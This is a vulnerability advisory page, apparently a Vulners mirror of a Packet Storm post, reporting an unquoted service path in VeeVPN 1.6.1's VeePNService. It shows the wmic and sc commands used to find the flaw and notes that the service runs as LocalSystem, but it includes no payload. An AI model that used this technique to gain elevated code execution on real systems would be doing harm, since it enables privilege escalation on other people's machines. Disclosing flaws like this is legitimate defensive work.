Lucene search
K

VeeVPN 1.6.1 Unquoted Service Path

🗓️ 24 Mar 2025 00:00:00Reported by Doğukan OrhanType 
packetstorm
 packetstorm
🔗 packetstorm.news👁 128 Views

VeeVPN 1.6.1 has an unquoted service path vulnerability allowing elevated code execution.

Code
# Exploit Title: VeeVPN 1.6.1 - 'VeePNService' Unquoted Service Path
    # Date: 2024-12-27
    # Exploit Author: Doğukan Orhan
    # Vendor Homepage: https://veepn.com/
    # Version: 1.6.1
    # Tested on: Windows 10 Pro x64
    
    
    # Step to discover Unquoted Service Path:
    
    C:\Users\PC>wmic service where 'name like "%VeePNService%"' get name, displayname, pathname, startmode, startname
    
    #Service Info
    
    C:\Users\PC>sc qc VeePNService
    [SC] QueryServiceConfig SUCCESS
    
    SERVICE_NAME: VeePNService
            TYPE               : 10  WIN32_OWN_PROCESS
            START_TYPE         : 2   AUTO_START
            ERROR_CONTROL      : 1   NORMAL
            BINARY_PATH_NAME   : C:\Program Files (x86)\VeePN\service\VeePNService.exe
            LOAD_ORDER_GROUP   :
            TAG                : 0
            DISPLAY_NAME       : VeePNService
            DEPENDENCIES       :
            SERVICE_START_NAME : LocalSystem
    
    # Exploit:
    
    This vulnerability could permit executing code during startup or reboot with the escalated privileges.

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

24 Mar 2025 00:00Current
7.4High risk
Vulners AI Score7.4
128